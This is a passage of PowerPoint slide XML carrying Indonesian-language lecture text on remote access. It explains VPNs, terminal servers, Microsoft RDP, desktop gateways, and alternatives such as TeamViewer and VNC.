              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lembaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemerintah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perawatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesehatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </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12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="99248041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Desktop Jarak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jauh</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>VPN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyambungkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> PC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ponsel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cerdas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>privat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terowongan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Akses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sarana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyambungkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jenis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyambungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server terminal pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mentransfer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data shell. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sambungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berupa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan server terminal pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Alat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>grafis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengirimkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan audio </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mentransfer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> input mouse dan keyboard </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Remote Desktop Protocol (RDP) Microsoft </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mesin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu-ke-satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alternatif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengoperasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> gateway desktop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memfasilitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> desktop virtual </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> individual yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berjalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Koneksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> RDP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dienkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> default. Ada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alternatif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>populer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Remote Desktop. Sebagian </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> platform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Windows (macOS dan iOS, Linux, Chrome OS, dan Android, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Contohnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TeamViewer (teamviewer.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) dan Virtual Network Computing (VNC), yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terutama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> realvnc.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Di masa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> desktop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
